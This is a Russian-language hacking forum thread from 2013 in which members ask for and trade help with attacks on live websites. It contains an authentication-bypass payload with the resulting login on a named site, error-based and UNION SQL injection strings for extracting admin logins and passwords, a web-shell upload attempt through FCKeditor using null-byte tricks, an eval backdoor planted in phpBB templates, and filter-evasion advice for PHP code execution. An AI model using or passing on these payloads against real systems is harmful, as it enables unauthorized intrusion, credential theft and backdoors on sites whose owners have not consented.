Ваши вопросы по уязвимостям.

qaz · 7 Mar 2013

сорь, может не в тему но, слили БД сайта, админку найти не могу, в БД таюлици имеют префикс xpanel - в гугле ничего не могу найти про этот двиг, офф сайт уже давно в оффе, может кто что знает про етот двиг? где там админку можно найти?

cat1vo · 7 Mar 2013

Always said:

http://adjump.ru/
пост
logsecurecash=1&login_name=[SQL inj]&login_pass=111111&x=31&y=13

перепробовал различные варианты...никак.
Click to expand...

logsecurecash=1&login_name=' or 1#&login_pass=111111&x=31&y=13

Вы зашли как: advaweb
Баланс: 10 руб.

Always · 7 Mar 2013

cat1vo said:

logsecurecash=1&login_name=' or 1#&login_pass=111111&x=31&y=13

Вы зашли как: advaweb
Баланс: 10 руб.
Click to expand...

Стыдно, спасибо

BigBear · 9 Mar 2013

pharm_all said:

Mssql

Надо вывести name lastname email

(select top 1 cast(name as nvarchar)+char(0x7a)+cast(email as nvarchar) from member where id=4)--

вывод: name:[email protected]

Как вывести еще lastname в одном запросе , если делаю

(select top 1 cast(name as nvarchar)+char(0x7a)+cast(lastname as nvarchar+char(0x7а)+cast(email as nvarchar) from member where id=4)--

Не выводит 3 значение : name:lastname:[email protected]

Как вывести одним запросом 3 значения?
Click to expand...

Потому что скобку забыл в запросе

(select top 1 cast(name as nvarchar)+char(0x7a)+cast(lastname as nvarchar)+char(0x7а)+cast(email as nvarchar) from member where id=4)--

kacergei · 9 Mar 2013

Подскажите по поводу FCKeditor 2.5.1 Build 17566
txt файлы спокойно льются, а вот php никак нехочет пробывал:
1) Через /php/upload.php?Type=Media
2) Грузил txt указывал в Current Folder: wso.php%00
3) Пробывал %00 в url-decode, так же пробывал wso2.php%00.txt
Что посоветуете? других дыр нет есть еще CKEditor 3.2.1
Двиг: Powered by cc Engine (китайский двиг)
P.S>.htaccess так же не грузит

GroM88 · 9 Mar 2013

Подскажите в чем может быть проблема
Сообственно пытаюсь лить шелл через админку phpbb 3 через стили
Включаю выполнение php кода в шаблонах, иду в шаблоны faq_body.html
впиливаю код <?php eval(stripslashes($_REQUEST[c])); ?>
Иду в forum.com/faq.php?c=phpinfo(); пхпинфо не выводится = \
Подскажите почему может не выполнятся пхпкод
права в админке полные, мб можно еще какнить залить?

panfilov1991 · 9 Mar 2013

cat1vo said:
Что за бред, думать надо хоть не много головой, инъекция в куках, а Вы хотите их отключить? Тут дело в другом, человек совершенно не умеет этим всем пользоваться и работать с тем, что нашел ему сканер, да и по всей видимости, сам не понимает, что хочет.

Все отлично работает, запрос переделал, мне так удобнее...
Code:
Host: game.*****.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Cookie: login=demodemo; pass="or(1)group+by(mid((select+concat_ws(0x3a,version(),schema())),rand(0)|0))having(avg(0))or"
Duplicate entry '5.5.29-1-log:s10parl' for key 'group_key'

Версия - 5.5.29-1-log
Названия Базы Данных - s10parl

"or(1)group+by(mid((СЮДА ВСТАВЛЯЙТЕ СВОЙ ЗАПРОС),rand(0)|0))having(avg(0))or"
Дальше делайте сами, если не знаете как, на форуме есть мануал - ССЫЛКА

З.Ы. Для работы можете пользоваться тем же Acunetix, Burp Suite, Firefox (Live HTTP Headers) или HTTPAnalyzer (я предпочитаю его)!
Click to expand...
пытаюсь отправить запросы для вывода данных хотя бы юзеров.
то и дело выходят ошибки :

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' at line 1
Click to expand...

Table 'panel.users' doesn't exist
Click to expand...

Table 'panel.***' doesn't exist
Click to expand...

Подскажите где взять список запросов?

winstrool · 9 Mar 2013

panfilov1991 said:

пытаюсь отправить запросы для вывода данных хотя бы юзеров.
то и дело выходят ошибки :
Подскажите где взять список запросов?
Click to expand...

а какой запрос вы делайте? покажите.

panfilov1991 · 9 Mar 2013

winstrool said:

а какой запрос вы делайте? покажите.
Click to expand...

"or(1)group+by(mid((SELECT * FROM users WHERE login='Admin' AND pass='123' OR login='Admin' --''),rand(0)|0))having(avg(0))or"
Click to expand...

ошибка :

Table 'panel.users' doesn't exist
Click to expand...

Как можно вывести названия таблиц?
Очень надо вывести логин и пасс админа

winstrool · 9 Mar 2013

panfilov1991 said:

ошибка :

Как можно вывести названия таблиц?
Очень надо вывести логин и пасс админа
Click to expand...

"or(1)group+by(mid((SELECT concat_ws(0x3a,login,pass) FROM users WHERE login=0x41646D696E limit 0,1),rand(0)|0))having(avg(0))or"
Click to expand...

там где значение 0x41646D696E это Admin, вам бы мануалы по mysql почитать!

panfilov1991 · 9 Mar 2013

winstrool said:

там где значение 0x41646D696E это Admin, вам бы мануалы по mysql почитать!
Click to expand...

Мне реально стыдно! я уже их перечитался!
мне бы пароль админа содрать, или таблицы вывести с БД

qaz · 9 Mar 2013

GroM88 said:

Подскажите в чем может быть проблема
Сообственно пытаюсь лить шелл через админку phpbb 3 через стили
Включаю выполнение php кода в шаблонах, иду в шаблоны faq_body.html
впиливаю код <?php eval(stripslashes($_REQUEST[c])); ?>
Иду в forum.com/faq.php?c=phpinfo(); пхпинфо не выводится = \
Подскажите почему может не выполнятся пхпкод
права в админке полные, мб можно еще какнить залить?
Click to expand...

так вставляй

PHP:

 phpinfo(); 

panfilov1991 said:

Мне реально стыдно! я уже их перечитался!
мне бы пароль админа содрать, или таблицы вывести с БД
Click to expand...

так а в чём собственно проблема?

GroM88 · 9 Mar 2013

qaz said:

так вставляй

PHP:

 phpinfo(); 

Click to expand...

ни какого эффекта) ничего не выводит = \
я уже пробовал так)

KolosJey · 9 Mar 2013

winstrool said:

"or(1)group+by(mid((SELECT concat_ws(0x3a,login,pass) FROM users WHERE login=0x41646D696E limit 0,1),rand(0)|0))having(avg(0))or"

там где значение 0x41646D696E это Admin, вам бы мануалы по mysql почитать!
Click to expand...

Тебе бы тоже хоть что нибудь почитать, вместо того что бы советы давать.

panfilov1991 said:

Table 'panel.users' doesn't exist
Click to expand...

m00c0w · 10 Mar 2013

KolosJey said:

Тебе бы тоже хоть что нибудь почитать, вместо того что бы советы давать.
Click to expand...

он ему запрос дал и посоветовал мускуль подучить, чтоб он сам смог вывести таблицы, а ты тупо "умничаешь."

Always · 10 Mar 2013

Делаю такой запрос
1+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42&x=-392&y=-378 true

1+UnIon+selECt+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+INFORMATION_SCHEMA.TABLES+--+&x=-392&y=-378 false

Выдает
Illegal mix of collations for operation 'UNION'

Как быть?

Га-Ноцри · 10 Mar 2013

Always said:

Делаю такой запрос
1+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42&x=-392&y=-378 true

1+UnIon+selECt+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+INFORMATION_SCHEMA.TABLES+--+&x=-392&y=-378 false

Выдает
Illegal mix of collations for operation 'UNION'

Как быть?
Click to expand...

Если не ошибаюсь, то такая ошибка обычно связана с проблемами в кодировке. И, судя по всему, в ошибке в вашем случае явно не указана нужная. Если ошибаюсь то меня поправят.

Немного пищи для размышления:

cast(version()+as+binary)
convert(version(),binary)
convert(version()+using+latin1)
convert(version()+using+binary)
aes_decrypt(aes_encrypt(version(),1),1)
unhex(hex(version()))

Попробуйте при выводе нужной информации использовать приведенные выше примеры.

HeaVeNSeR · 10 Mar 2013

ребят,хелп ми,плз

есть уязвимость 'PHP Code execution'...выполняются phpinfo(),system(ls) и т.д.....слэшируются кавычки,хотя MQ=Off...всё бы ничего,можно было бы обойти c помощью base64,либо system($_GET[a])...но режутся заглавные....

что можно сделать в данном случае?

Konqi · 10 Mar 2013

HeaVeNSeR said:

ребят,хелп ми,плз

есть уязвимость 'PHP Code execution'...выполняются phpinfo(),system(ls) и т.д.....слэшируются кавычки,хотя MQ=Off...всё бы ничего,можно было бы обойти c помощью base64,либо system($_GET[a])...но режутся заглавные....

что можно сделать в данном случае?
Click to expand...

print(`я консольная команда`);

HeaVeNSeR · 10 Mar 2013

Konqi said:

print(`я консольная команда`);
Click to expand...

не совсем понял...)
как,к примеру,вывести результат system('ls -la')? (экранируются кавычки и режутся заглавные)

Ваши вопросы по уязвимостям.

qaz Elder - Старейшина

cat1vo Level 8

Always New Member

BigBear Escrow Service
Staff Member Гарант - Escrow Service

kacergei Member

GroM88 Elder - Старейшина

panfilov1991 New Member

winstrool MasterBlind

panfilov1991 New Member

winstrool MasterBlind

panfilov1991 New Member

qaz Elder - Старейшина

GroM88 Elder - Старейшина

KolosJey Member

m00c0w Banned

Always New Member

Га-Ноцри Elder - Старейшина

HeaVeNSeR Member

Konqi Green member

HeaVeNSeR Member

Useful Searches

Ваши вопросы по уязвимостям.

qaz Elder - Старейшина

cat1vo Level 8

Always New Member

BigBear Escrow Service Staff Member Гарант - Escrow Service

kacergei Member

GroM88 Elder - Старейшина

panfilov1991 New Member

winstrool ~~*MasterBlind*~~

panfilov1991 New Member

winstrool ~~*MasterBlind*~~

panfilov1991 New Member

qaz Elder - Старейшина

GroM88 Elder - Старейшина

KolosJey Member

m00c0w Banned

Always New Member

Га-Ноцри Elder - Старейшина

HeaVeNSeR Member

Konqi Green member

HeaVeNSeR Member

BigBear Escrow Service
Staff Member Гарант - Escrow Service

winstrool MasterBlind

winstrool MasterBlind